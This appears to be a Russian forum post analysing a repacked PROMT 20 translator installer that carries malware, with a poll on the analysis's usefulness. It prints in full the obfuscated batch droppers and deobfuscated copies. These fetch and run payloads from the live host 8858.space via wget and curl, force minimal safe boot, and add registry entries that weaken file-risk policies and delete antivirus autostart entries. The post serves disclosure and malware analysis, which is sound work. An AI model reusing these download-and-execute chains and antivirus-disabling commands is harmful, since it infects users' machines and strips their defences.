Классический форум-трекер
canvas not supported
Нас вместе: 4 114 708

Исследование вирусной активности перепаковки PROMT_20_Professional.exe


 
 
RSS
Начать новую тему   Ответить на тему    Торрент-трекер NNM-Club -> Софт и все вокруг -> Защита данных

Полезно ли такое исследование?
да
100%
 100%  [ 18 ]
нет
0%
 0%  [ 0 ]
Всего голосов : 18

Автор Сообщение
Eastoop ®
Зам.Куратора Программ
Стаж: 11 лет 1 мес.
Сообщений: 14254
Ratio: 188,826
Поблагодарили: 59668
100%
Откуда: UTC+10
nnm-club.gif
Promt 20 (Professional, Expert, Master, Freelance, MS Office) + Dictionaries Collection [Multi/Ru]
Из 6 дистрибутивных пакетов один оказался перепакованным: PROMT_20_Professional.exe
Подробности проверки вирусной активности.
1. Подозрение пользователя на вирусы вызвало отсутствие цифровой подписи у дистрибутива. Релизер не смог обнаружить вирус и заразил свой компьютер. При принудительной распаковке установочного файла с помощью 7Z обнаружилось, что распаковка происходит не полностью, но конфигуратор установки все таки удалось заполучить.
Оказалось, что перепаковка выполнена при помощи Smart Install Maker и, кроме распаковки дистрибутива, в систему загружается порция файлов для скачивания вирусов.

2. Запуск на виртуальной машине позволил получить набор этих стартовых файлов. В папку windows при запуске зараженного инсталлятора распаковывается файл set-up.exe (оригинальный инсталлятор), распаковка идет долго из-за большого размера файла, а также файл a.bat, который тут же запускается. Также в папке windows создаются папки wget и curl, обеспечивающие работу батника.
Код: выделить все
@echo off
set "a3=t"
set "j=e"
set "xj66=s"
s%j%%a3% "yui=5"
s%j%%a3% "zx3=""
s%j%%a3% "gs1=in"
s%j%%a3% "a5=."
s%j%%a3% "c44=a"
s%j%%a3% "dn=("
s%j%%a3% "gdfg5=W"
s%j%%a3% "a1=h"
s%j%%a3% "jh4=8"
s%j%%a3% "n3=i"
s%j%%a3% "a2=p"
s%j%%a3% "f=x"
s%j%%a3% "a6=:"
s%j%%a3% "fsf4=o"
s%j%%a3% "gfg33=l"
s%j%%a3% "pi=r"
s%j%%a3% "k=at"
s%j%%a3% "aa2=l"
s%j%%a3% "hy=\"
s%j%%a3% "b=b"
s%j%%a3% "gt12=a"
s%j%%a3% "r=d"
s%j%%a3% "d=%jh4%8%yui%%jh4%"
s%j%%a3% "hh=st"
s%j%%a3% "z=%xj66%%a2%%c44%c%j%"
s%j%%a3% "bf5=d"
s%j%%a3% "kl=-"
s%j%%a3% "r8=no%pi%m%gt12%%aa2%"
s%j%%a3% "c=w"
s%j%%a3% "yt=="
s%j%%a3% "s5=%xj66%%a3%ar%a3%"
s%j%%a3% "b2=dy"
s%j%%a3% "e9=)"
s%j%%a3% "v1=n"
s%j%%a3% "a4=/"
s%j%%a3% "g1=%windir%"
s%j%%a3% "a7=rs"
s%j%%a3% "l=%a1%%a3%%a3%%a2%%a6%%a4%%a4%%d%%a5%%z%%a4%%a7%%a4%%hh%"
::
::-----------------------------------------------------------------
::     e:   %j%%f%%j%    m: m%xj66%%n3%
::--------------------------------------|       |------------------
%s5% %a4%%r8% %g1%%hy%S%j%%a3%-u%a2%%a5%%j%%f%%j%
%n3%f %j%%f%%n3%s%a3% "%g1%%hy%y%a5%t%f%t" d%j%l %0
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
s%j%t osver=Unknown
v%j%r | findstr /IL "5.1." > nul
%n3%F %errorlevel% EQU 0 s%j%t "osver=Windows_XP"
%n3%F %osver% == Windows_XP %dn%
go%a3%o n
%e9% %j%ls%j% %dn%
go%a3%o y
%e9%
:y
s%j%%a3% %xj66%s%yt%s%a5%t%f%%a3%
f%fsf4%%pi% %a4%f %zx3%u%xj66%%j%b%gt12%ckq d%j%l%n3%m%xj66%=%zx3% %%i %gs1% %dn%%zx3%%ss%%zx3%%e9% d%fsf4% s%j%%a3% %%~i
set "ua=%sid%"
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% %kl%c %kl%P %zx3%%g1%%zx3% %zx3%%l%%a4%%b%%a5%%b%%k%%zx3% %kl%%kl%%pi%%j%f%j%%pi%%j%%pi%%yt%%zx3%%c44%%gfg33%%a2%%a1%%gt12%%zx3% %kl%%kl%u%xj66%e%pi%%kl%%c44%g%j%n%a3%%yt%%zx3%%ua%%zx3%
%n3%f %j%%f%%n3%st %zx3%%g1%%a4%%b%%a5%%b%%k%%zx3% %dn%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% %kl%c %kl%P %zx3%%g1%%zx3% %zx3%%l%%a4%%b%%a5%%j%%f%%j%%zx3% %kl%%kl%%pi%%j%f%j%%pi%%j%%pi%%yt%%zx3%%gt12%%aa2%%a2%%a1%%c44%%zx3%
%s5% %a4%%r8% %g1%%hy%%b%%a5%%j%%f%%j%
%e9% %j%%aa2%s%j% %dn%
go%a3%o n
%e9%
d%j%l %0
:n
d%j%%aa2% %0
::
Код: выделить все
@echo off
set "a3=t"
set "j=e"
set "xj66=s"
set "yui=5"
set "zx3=""
set "gs1=in"
set "a5=."
set "c44=a"
set "dn=("
set "gdfg5=W"
set "a1=h"
set "jh4=8"
set "n3=i"
set "a2=p"
set "f=x"
set "a6=:"
set "fsf4=o"
set "gfg33=l"
set "pi=r"
set "k=at"
set "aa2=l"
set "hy=\"
set "b=b"
set "gt12=a"
set "r=d"
set "d=8858"
set "hh=st"
set "z=space"
set "bf5=d"
set "kl=-"
set "r8=normal"
set "c=w"
set "yt=="
set "s5=start"
set "b2=dy"
set "e9=)"
set "v1=n"
set "a4=/"
set "g1=%windir%"
set "a7=rs"
set "l=http://8858.space/rs/st"
::
::-----------------------------------------------------------------
::     e:   exe    m: msi
::--------------------------------------|       |------------------
start /normal %windir%\Set-up.exe
if exist "%windir%\y.txt" del %0

set osver=Unknown
ver | findstr /IL "5.1." > nul
iF %errorlevel% EQU 0 set "osver=Windows_XP"
iF %osver% == Windows_XP (
goto n
) else (
goto y
)
:y
set ss=s.txt
for /f "usebackq delims=" %%i in ("%ss%") do set %%~i
set "ua=%sid%"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/b.bat" --referer="alpha" --user-agent="%sid%"
if exist "%windir%/b.bat" (
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/b.exe" --referer="alpha"
start /normal %windir%\b.exe
) else (
goto n
)
del %0
:n
del %0
::
3. В результате исполнения батника в папку windows скачиваются еще два файла: b.bat и b.exe, первый продолжает загрузку очередной порции файлов, а второй обеспечивает защиту и восстановление батника, а также его работу.
Код: выделить все
@echo off
::
set "sym=_"
set "a3=t"
set "j=e"
set "xj66=s"
::
s%j%%a3% "yui=5"
s%j%%a3% "zx3=""
s%j%%a3% "gs1=in"
s%j%%a3% "gdfg5=W"
s%j%%a3% "a5=."
s%j%%a3% "c44=a"
s%j%%a3% "dn=("
s%j%%a3% "ssd3=R"
s%j%%a3% "a1=h"
s%j%%a3% "dfg=="
s%j%%a3% "jh4=8"
s%j%%a3% "n3=i"
s%j%%a3% "a2=p"
s%j%%a3% "f=x"
s%j%%a3% "a6=:"
s%j%%a3% "fsf4=o"
s%j%%a3% "lkj6=K"
s%j%%a3% "gfg33=l"
s%j%%a3% "pi=r"
s%j%%a3% "yr3=""
s%j%%a3% "k=at"
s%j%%a3% "yfb={"
s%j%%a3% "aa2=l"
s%j%%a3% "vbvc56=O"
s%j%%a3% "hy=\"
s%j%%a3% "b=b"
s%j%%a3% "gt12=a"
s%j%%a3% "gdg5=M"
s%j%%a3% "r=d"
s%j%%a3% "d=%jh4%8%yui%%jh4%"
s%j%%a3% "hh=st"
s%j%%a3% "z=%xj66%%a2%%c44%c%j%"
s%j%%a3% "bf5=d"
s%j%%a3% "kl=-"
s%j%%a3% "r8=no%pi%m%gt12%%aa2%"
s%j%%a3% "c=w"
s%j%%a3% "yt=="
s%j%%a3% "s5=%xj66%%a3%ar%a3%"
s%j%%a3% "b2=dy"
s%j%%a3% "e9=)"
s%j%%a3% "v1=n"
s%j%%a3% "a4=/"
s%j%%a3% "g1=%windir%"
s%j%%a3% "a7=rs"
s%j%%a3% "l=%a1%%a3%%a3%%a2%%a6%%a4%%a4%%d%%a5%%z%%a4%%a7%%a4%%hh%"
s%j%%a3% "mdp5=--%pi%%j%f%j%%pi%%j%%pi%"
s%j%%a3% "hg4=%c44%%gfg33%%a2%%a1%%gt12%"
::
s%j%%a3% %xj66%s%yt%s%a5%t%f%%a3%
f%fsf4%%pi% %a4%f %yr3%u%xj66%%j%b%gt12%ckq d%j%l%n3%m%xj66%=%yr3% %%i %gs1% %dn%%yr3%%ss%%yr3%%e9% d%fsf4% s%j%%a3% %%~i
set "title=%rn%"
set "sub=%sid%"
set "pos=%pid%"
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
::
%pi%%j%g d%j%l%j%t%j% %yr3%H%lkj6%L%gdg5%%hy%S%vbvc56%FT%gdfg5%A%ssd3%E%hy%%gdg5%%n3%c%pi%%fsf4%s%fsf4%f%a3%%hy%%gdfg5%%n3%nd%fsf4%w%xj66%%hy%Cu%pi%r%j%n%a3%V%j%%pi%s%n3%%fsf4%n%hy%Un%n3%n%xj66%%a3%al%aa2%%hy%%title%%yr3% %a4%f %a4%r%j%g%a6%32
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%d%a5%%b%%k%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%c%a5%%j%%f%%j%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%d%a5%%j%%f%%j%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%c%a5%%b%%k%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%c%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%e%a5%%pi%%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%d%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%mg%pi%_n%a5%%pi%%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%mg%pi%_f%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%u%xj66%w%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%%c44%t%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%c%a3%%a5%%pi%%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%e%a3%%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%m%a3%%a5%%pi%%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%pi%%j%g%j%d%n3%t %a4%s %g1%%hy%c%a5%r%j%g
bc%bf5%%j%d%n3%t %a4%s%j%t %yr3%%yfb%cu%pi%r%j%n%a3%}%yr3% s%gt12%f%j%boo%a3% %yr3%m%n3%n%n3%m%gt12%%aa2%%yr3%
d%j%%aa2% %g1%%hy%b%a5%%j%%f%%j%
d%j%l %g1%%hy%c%a5%r%j%g
%g1%%hy%cu%pi%%aa2%%hy%cu%pi%%aa2%%a5%%j%%f%%j% %yr3%%a1%%a3%%a3%%a2%%a6%%a4%%a4%%d%%a5%s%a2%%gt12%c%j%%a4%cu%pi%%aa2%%a4%%pi%un%n3%%a5%%a2%h%a2%?%xj66%ub%n3%d%yt%%pos%%sym%%sub%%yr3% %mdp5% %yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%y%a5%%a3%x%a3%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
d%j%%aa2% %0
::
Код: выделить все
@echo off
::
set "sym=_"
set "a3=t"
set "j=e"
set "xj66=s"
::
set "yui=5"
set "zx3=""
set "gs1=in"
set "gdfg5=W"
set "a5=."
set "c44=a"
set "dn=("
set "ssd3=R"
set "a1=h"
set "dfg=="
set "jh4=8"
set "n3=i"
set "a2=p"
set "f=x"
set "a6=:"
set "fsf4=o"
set "lkj6=K"
set "gfg33=l"
set "pi=r"
set "yr3=""
set "k=at"
set "yfb={"
set "aa2=l"
set "vbvc56=O"
set "hy=\"
set "b=b"
set "gt12=a"
set "gdg5=M"
set "r=d"
set "d=8858"
set "hh=st"
set "z=space"
set "bf5=d"
set "kl=-"
set "r8=normal"
set "c=w"
set "yt=="
set "s5=start"
set "b2=dy"
set "e9=)"
set "v1=n"
set "a4=/"
set "g1=%windir%"
set "a7=rs"
set "l=http://8858.space/rs/st"
set "mdp5=--referer"
set "hg4=alpha"
::
set ss=s.txt
for /f "usebackq delims=" %%i in ("s.txt") do set %%~i
set "title=%rn%"
set "sub=%sid%"
set "pos=%pid%"
::
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%rn%" /f /reg:32
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/d.bat" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/c.exe" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/d.exe" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/c.bat" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/c.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/e.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/d.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/mgr_n.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/mgr_f.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/usw.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/at.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/ct.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/et.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/mt.reg" --referer="alpha"
regedit /s %windir%\c.reg
bcdedit /set "{current}" safeboot "minimal"
del %windir%\b.exe
del %windir%\c.reg
%windir%\curl\curl.exe "http://8858.space/curl/runi.php?subid=%pid%_%sid%" --referer "alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/y.txt" --referer="alpha"
del %0
::
4. При исполнении b.bat скачиваются еще несколько файлов, которые работают в комплексе, размножаются по системным папкм, прописываются в автозагрузку и планировщик заданий, отключают выход в безопасный режим и загрузку антивирусов и т.д. и т.п.
Список загружаемых файлов:
at.reg
c.bat
c.exe
c.reg
ct.reg
d.bat
d.exe
d.reg
e.reg
et.reg
mgr_f.reg
mgr_n.reg
mt.reg
usw.reg
Часть файлов имеют идентичное содержимое и просто дублируют друг друга для усложнения удаления заразы.
Код: выделить все
@echo off
::
::
set "osX=%PROCESSOR_ARCHITECTURE%"
if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
if "%osX%"=="x86" (
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=868" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
) else (
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=868" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64
